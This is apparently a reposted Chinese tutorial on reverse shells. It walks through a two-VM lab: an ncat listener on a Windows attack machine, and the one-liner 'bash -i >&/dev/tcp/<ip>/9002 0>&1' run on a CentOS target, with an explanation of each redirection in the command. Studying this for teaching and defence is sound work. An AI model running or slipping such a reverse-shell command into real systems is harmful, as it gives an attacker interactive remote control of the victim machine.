【shell编程学习】反弹shell

这篇具有很好参考价值的文章主要介绍了【shell编程学习】反弹shell。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

反弹实验

机器 IP
win10虚拟机 192.168.242.129 攻击机
centos 虚拟机 192.168.242.131 靶机

1,win10机器安装Ncat 来监听端口

简单来说,就是下载netcat 安装包,解压,将nc.exe 复制到C:\Windows\System32的文件夹下。即可使用nc命令来监听端口。

 windows环境下nc全称netcat 安装及使用 - 疯狂の猿猴 

监听命令:nc -lvvp 9002 

nc -lvvp 9002

【shell编程学习】反弹shell

2,在靶机器上下反弹shell命令

bash -i >&/dev/tcp/192.168.242.129/9002 0>&1

 【shell编程学习】反弹shell

3,在攻击机(win10)上控制靶机(centos机器)

【shell编程学习】反弹shell

反弹shell就是让靶机的控制权通过shell命令交给控制机。

 

反弹shell解析

 bash -i >&/dev/tcp/192.168.242.129/9002 0>&1

bash -i 是产生交互式的shell

/dev/tcp/192.168.242.129/9002  /dev/tcp/ip/port 这是一个特殊文件,它会建立一个连接到192.168.242.129:9002的socket

>& 是将标准输出1重定位到后面这个文件中,即socket中

0>&1是将标准输入0重定位到标准输出1中,而标准输出1又重新定位到了socket。所以攻击机中既能输入命令又能展示命令结果文章来源地址https://www.toymoban.com/news/detail-463346.html

到了这里,关于【shell编程学习】反弹shell的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【Python机器学习】实验15 将Lenet5应用于Cifar10数据集

    CIFAR-10 数据集由10个类别的60000张32x32彩色图像组成,每类6000张图像。有50000张训练图像和10000张测试图像。数据集分为五个训练批次 和一个测试批次,每个批次有10000张图像。测试批次包含从每个类别中随机选择的1000张图像。训练批次包含随机顺序的剩余图像,但一些训练批

    2024年02月11日
    浏览(26)
  • 【Python机器学习】实验15 将Lenet5应用于Cifar10数据集(PyTorch实现)

    CIFAR-10 数据集由10个类别的60000张32x32彩色图像组成,每类6000张图像。有50000张训练图像和10000张测试图像。数据集分为五个训练批次 和一个测试批次,每个批次有10000张图像。测试批次包含从每个类别中随机选择的1000张图像。训练批次包含随机顺序的剩余图像,但一些训练批

    2024年02月11日
    浏览(28)
  • 实验四、shell编程

    1.了解shell的特点和主要种类。 2.掌握 shel1 脚本的建立和执行方式。 3.掌握bash的基本语法。 4.学会编写shell 脚本。 shell 脚本的建立和执行。 历史命令和别名定义。 shell变量和位置参数、环境变量。 bash的特殊字符。 一般控制结构。 算术运算及bash 函数。 利用 vi建立一个脚本

    2024年02月08日
    浏览(25)
  • 反弹shell原理与实现

    反弹shell(Reverse Shell)是一种常用于网络攻击中的技术,其目的是让攻击者通过远程控制程序获取被攻击计算机的权限。反弹shell技术通常是通过在受害者计算机上运行一个程序(称为“后门”),将计算机的控制权传递给攻击者。攻击者可以使用该程序在远程计算机上执行

    2024年02月05日
    浏览(30)
  • shell编程实验-文件状态测试

    一、实验目的: 熟悉UNIX的基本SHELL程序设计方法,包括: (1)命令行参数检测; (2)变量设置; (3)文件状态检测与特定信息读取; (4)程序运行控制。 二、实验原理: (1)SHELL程序的主要用途 在SHELL程序中不仅仅可以使用命令的集合,而且可以安排自动化处理过程

    2024年02月11日
    浏览(24)
  • 059 提权与反弹shell

    在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,对于渗透来说,获得的权限越高,控制的服务器就会越多。 网站首先通过漏洞获取webshell,然后通过shell进行提权。 计算机中的权限: 匿名访问权限 来宾权限 用户权限 管理员权限 系统权限 水平权限提升(越权)

    2024年02月07日
    浏览(30)
  • LINUX shell反弹篇(一)

    在kali机上监听端口: 在 centos上使用: 这条命令我也在网上查了很多资料,总结了一下 bash -i 就是打开一个bash 符号定义: 当后面跟着文件时,就表示为将标准输出和标准错误输出到重定向的文件也就是监听端上。 当后面跟着文件标识符时,就表示将前面的文件描述符重定

    2024年02月15日
    浏览(43)
  • 交互式shell与非交互式shell,反弹shell

    交互shell就是shell等待你的输入,并且立即执行你提交的命令。 这种模式被称作交互式是因为shell与用户进行交互。 这种模式也是大多数用户非常熟悉的:登录、执行一些命令、签退。当签退后,shell也终止了。 需要进行信息交互,例如输入某个信息 会返回信息 你需要对其输

    2024年02月02日
    浏览(42)
  • shell编程实验-用户登录状态监测

    一、实验目的: 使学生熟悉一种简单的指定用户的监测方法,熟悉UNIX的基本SHELL程序设计方法和使用技巧,包括: (1)命令行参数检测 (2)用户变量 (3)while循环控制 (4)暂停进程(sleep) 二、实验原理: (1)SHELL程序的主要用途 在SHELL程序中不仅仅可以使用命令的集

    2024年02月11日
    浏览(42)
  • 入侵检测——如何实现反弹shell检测?

    反弹shell的本质:就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 反弹shell的结果:一个client上的bash进程 可以和 server上的进程通信。

    2024年02月13日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包